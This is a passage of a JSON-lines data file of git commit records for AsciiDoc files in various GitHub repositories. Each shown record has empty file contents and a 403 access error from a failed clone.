'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66efaf044be187bce299d8ecc07a83faa5178fd7","subject":"Wording RS","message":"Wording RS\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client\/JAX-RS client.adoc","new_file":"WS client\/JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86f42887742758a3fa2cc2a1848a08231d9583f4","subject":"Delete 2016-02-26-Gantt.adoc","message":"Delete 2016-02-26-Gantt.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt.adoc","new_file":"_posts\/2016-02-26-Gantt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4b22730eb71a44241bb80424e3e505f83b7e3d1","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd64c57c27062ce09b43cb058dfab258014a5d36","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0665cf2907eb4384ddc1e11d77aaec8c5c92d74a","subject":"Update 2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","message":"Update 2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","new_file":"_posts\/2015-05-06-Hola-Mundo-Leer-Escribir-Main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aec3813bebbb1da6fe24594cf6bc7ee613e25efc","subject":"Update 2016-02-09-Accelerate-tomcat-78-start-up.adoc","message":"Update 2016-02-09-Accelerate-tomcat-78-start-up.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-02-09-Accelerate-tomcat-78-start-up.adoc","new_file":"_posts\/2016-02-09-Accelerate-tomcat-78-start-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42dd80b30f2eb5a93ceb1300415c49e6a35b6e71","subject":"Update 2016-09-06-Reverse-a-Singley-Linked-List.adoc","message":"Update 2016-09-06-Reverse-a-Singley-Linked-List.adoc","repos":"rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io","old_file":"_posts\/2016-09-06-Reverse-a-Singley-Linked-List.adoc","new_file":"_posts\/2016-09-06-Reverse-a-Singley-Linked-List.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rushil-patel\/rushil-patel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b45b9586df49823e654e2cccee2695b086433750","subject":"Added Forge 3.0.0.Beta3 announcement","message":"Added Forge 3.0.0.Beta3 announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-01-21-forge-3.0.0.beta3.asciidoc","new_file":"news\/2016-01-21-forge-3.0.0.beta3.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9aea33fc5e31d3358edeb35b3e5a9fb07bd8e734","subject":"indonesian readme added","message":"indonesian readme added\n","repos":"rafeyu\/dnrdrhc","old_file":"README-id.adoc","new_file":"README-id.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rafeyu\/dnrdrhc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de618e97cfa0e3b7e8f24cd3d628584b59759ff","subject":"Update 2016-10-23-What-is-Machine-Learning.adoc","message":"Update 2016-10-23-What-is-Machine-Learning.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-10-23-What-is-Machine-Learning.adoc","new_file":"_posts\/2016-10-23-What-is-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9edb2845387ccceab918866a967e31cf893ce67e","subject":"Update 2017-09-17-Sonata-Admin-Custom-Page.adoc","message":"Update 2017-09-17-Sonata-Admin-Custom-Page.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-09-17-Sonata-Admin-Custom-Page.adoc","new_file":"_posts\/2017-09-17-Sonata-Admin-Custom-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce1c4675410c80e2325f2f98eff8b0d7491a511","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64726743e2c4dfa024d311ceba0cb4d67cdc4e7d","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e77d73be55a26e086b8443567c36729509f06044","subject":"Update 2017-03-03-IoT-and-Honey.adoc","message":"Update 2017-03-03-IoT-and-Honey.adoc","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"_posts\/2017-03-03-IoT-and-Honey.adoc","new_file":"_posts\/2017-03-03-IoT-and-Honey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cfec5b8a728236313d556a54ddbc01edd0e3793","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f73f7547426827f98274f6f6b72b1215b9922d5","subject":"Update 2015-06-02-Lab-Noteboo.adoc","message":"Update 2015-06-02-Lab-Noteboo.adoc","repos":"DominikVogel\/DominikVogel.github.io,DominikVogel\/DominikVogel.github.io,DominikVogel\/DominikVogel.github.io,DominikVogel\/DominikVogel.github.io","old_file":"_posts\/2015-06-02-Lab-Noteboo.adoc","new_file":"_posts\/2015-06-02-Lab-Noteboo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DominikVogel\/DominikVogel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8826e35ea9bc02311970d122efa23c2c3c7c440","subject":"Update 2016-07-19-Second-Post.adoc","message":"Update 2016-07-19-Second-Post.adoc","repos":"spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io,spikebachman\/spikebachman.github.io","old_file":"_posts\/2016-07-19-Second-Post.adoc","new_file":"_posts\/2016-07-19-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spikebachman\/spikebachman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"724430687c94e55d3b12f9cff75348e5206a6561","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9e1529babf79bf46361f82b9c5dcf007791bae3","subject":"Update 2016-12-03-Hello-World.adoc","message":"Update 2016-12-03-Hello-World.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-03-Hello-World.adoc","new_file":"_posts\/2016-12-03-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08606e72d49a90ce5543558b86866ecfdd143e9d","subject":"Renamed '_posts\/2019-01-31-Java.adoc' to '_posts\/2019-01-31-Java-server.adoc'","message":"Renamed '_posts\/2019-01-31-Java.adoc' to '_posts\/2019-01-31-Java-server.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Java-server.adoc","new_file":"_posts\/2019-01-31-Java-server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff7670d90ad4feb1531023dada383bf5bf530f38","subject":"Update 2019-03-22-A-W-S-C-L-I.adoc","message":"Update 2019-03-22-A-W-S-C-L-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef828b544bd57026730a201d1e77e1b4b641474","subject":"Fix formatting and clarify use of searchPaths in config server","message":"Fix formatting and clarify use of searchPaths in config server\n\nSee gh-117\n","repos":"royclarkson\/spring-cloud-config,psbateman\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fkissel\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,appleman\/spring-cloud-config,marbon87\/spring-cloud-config,psbateman\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fangjing828\/spring-cloud-config,mstine\/spring-cloud-config,royclarkson\/spring-cloud-config,fkissel\/spring-cloud-config,mbenson\/spring-cloud-config,royclarkson\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fkissel\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,shakuzen\/spring-cloud-config,marbon87\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fangjing828\/spring-cloud-config,appleman\/spring-cloud-config,appleman\/spring-cloud-config,mbenson\/spring-cloud-config,mbenson\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a3161dfd96c1680b80fa9330df6ebca534b20f8e","subject":"Update 2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","message":"Update 2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","new_file":"_posts\/2015-08-27-Boosting-and-managing-static-files-with-Django.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df1b9f14aca4a328802adc3c6942929390506543","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c81b9a161fcd553022e1bf85a0a601e155e615fc","subject":"Update 2015-02-14-Hello-World.adoc","message":"Update 2015-02-14-Hello-World.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-14-Hello-World.adoc","new_file":"_posts\/2015-02-14-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29bba0de4febb776705bbbef97e4c2e1644d9b78","subject":"Update 2015-06-09-Hello-World.adoc","message":"Update 2015-06-09-Hello-World.adoc","repos":"mkc188\/hubpress.io,mkc188\/hubpress.io,mkc188\/hubpress.io","old_file":"_posts\/2015-06-09-Hello-World.adoc","new_file":"_posts\/2015-06-09-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkc188\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f51b11f3fb0690c79d8acbcb9f9bf8e80bd8e693","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60582f51bc6a01c0b7a0b04b35c5bfa4ca04b262","subject":"Update 2017-05-22-Elo-adasban.adoc","message":"Update 2017-05-22-Elo-adasban.adoc","repos":"neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io","old_file":"_posts\/2017-05-22-Elo-adasban.adoc","new_file":"_posts\/2017-05-22-Elo-adasban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neurodiversitas\/neurodiversitas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15e9c3f85862a2867a2bbb9fbd45200d0aa596a6","subject":"cleaned up client vs source vs view","message":"cleaned up client vs source vs view\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c3dc22acd6cf2b16eaf8030c24d82c993fd3f67","subject":"Follow-up edit to PR#3680","message":"Follow-up edit to PR#3680\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/high_availability.adoc","new_file":"admin_guide\/high_availability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a3305ecab8ef62aa927aab4e4da4c364d33df10","subject":"README: \"Crediting information\" section","message":"README: \"Crediting information\" section\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ef9516909a07654ab9d0f74def7f79c60db8fb8a","subject":"just copied md to adoc... hmm","message":"just copied md to adoc... hmm\n","repos":"markllama\/aws-cli-thor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/aws-cli-thor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf17bc8ed514afafce360d5fafb003fb71e53943","subject":"Create README.adoc","message":"Create README.adoc\n","repos":"drumonii\/SpringBootTwoDataSources","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/drumonii\/SpringBootTwoDataSources.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f01ea22f8917c6b44f9b367bc217261d6ea5b8fc","subject":"readme4","message":"readme4\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2796bf023fdf69ff997481fa6124c6c689f53b4","subject":"Added DateTime docs","message":"Added DateTime docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c68075adf910d9a4cc1eab4c055a2ab7e3789c4","subject":"Added ComponentConfiguration to docs","message":"Added ComponentConfiguration to docs\n","repos":"adessaigne\/camel,tadayosi\/camel,DariusX\/camel,nicolaferraro\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,gnodet\/camel,pmoerenhout\/camel,apache\/camel,nikhilvibhav\/camel,ullgren\/camel,cunningt\/camel,tdiesler\/camel,christophd\/camel,onders86\/camel,zregvart\/camel,zregvart\/camel,pmoerenhout\/camel,adessaigne\/camel,cunningt\/camel,DariusX\/camel,punkhorn\/camel-upstream,apache\/camel,tadayosi\/camel,adessaigne\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,davidkarlsen\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,davidkarlsen\/camel,CodeSmell\/camel,nicolaferraro\/camel,objectiser\/camel,kevinearls\/camel,onders86\/camel,tdiesler\/camel,kevinearls\/camel,objectiser\/camel,mcollovati\/camel,DariusX\/camel,christophd\/camel,kevinearls\/camel,onders86\/camel,davidkarlsen\/camel,CodeSmell\/camel,davidkarlsen\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,mcollovati\/camel,tdiesler\/camel,kevinearls\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,gnodet\/camel,nikhilvibhav\/camel,zregvart\/camel,CodeSmell\/camel,zregvart\/camel,kevinearls\/camel,gnodet\/camel,Fabryprog\/camel,pmoerenhout\/camel,tadayosi\/camel,pax95\/camel,ullgren\/camel,pmoerenhout\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,apache\/camel,tdiesler\/camel,onders86\/camel,christophd\/camel,pax95\/camel,mcollovati\/camel,Fabryprog\/camel,nicolaferraro\/camel,tdiesler\/camel,christophd\/camel,onders86\/camel,apache\/camel,apache\/camel,gnodet\/camel,onders86\/camel,DariusX\/camel,pax95\/camel,alvinkwekel\/camel,alvinkwekel\/camel,tdiesler\/camel,cunningt\/camel,kevinearls\/camel,CodeSmell\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,objectiser\/camel,ullgren\/camel,nikhilvibhav\/camel,objectiser\/camel,adessaigne\/camel,alvinkwekel\/camel,Fabryprog\/camel","old_file":"docs\/user-manual\/en\/componentconfiguration.adoc","new_file":"docs\/user-manual\/en\/componentconfiguration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cd7e8dcda88eb14cfb5550b9e0575f4d88ca3a3","subject":"Added log instruction","message":"Added log instruction\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80295513a91cca2a140c138164e3c0d1bdad2435","subject":"Update 2013-06-07-Sparta.adoc","message":"Update 2013-06-07-Sparta.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-07-Sparta.adoc","new_file":"_posts\/2013-06-07-Sparta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3606e78bc0ec263242a47823b464f350c3635404","subject":"Update 2016-04-07-T-D-D-for-J-S-Learners.adoc","message":"Update 2016-04-07-T-D-D-for-J-S-Learners.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog,metasean\/blog","old_file":"_posts\/2016-04-07-T-D-D-for-J-S-Learners.adoc","new_file":"_posts\/2016-04-07-T-D-D-for-J-S-Learners.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f1e9dfa91d5e2a2db34c580e07904a934f85dc1","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45f9b27e44cd3d270ab5fa74160dddb0ab776261","subject":"Update 2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","message":"Update 2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","new_file":"_posts\/2015-08-07-Migration-de-WordPress-vers-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae09692ba49475583e6ae7cab27444db820df770","subject":"add clojutre 2020","message":"add clojutre 2020\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojutre.adoc","new_file":"content\/events\/2020\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7b8df71ee39cd24831b7489abe4d3b9ea11cf048","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd69f9b78dbc62b17b2bc14ddd44f9fbc09eb5ab","subject":"Update 2016-02-03-What-is-this-Blog-about.adoc","message":"Update 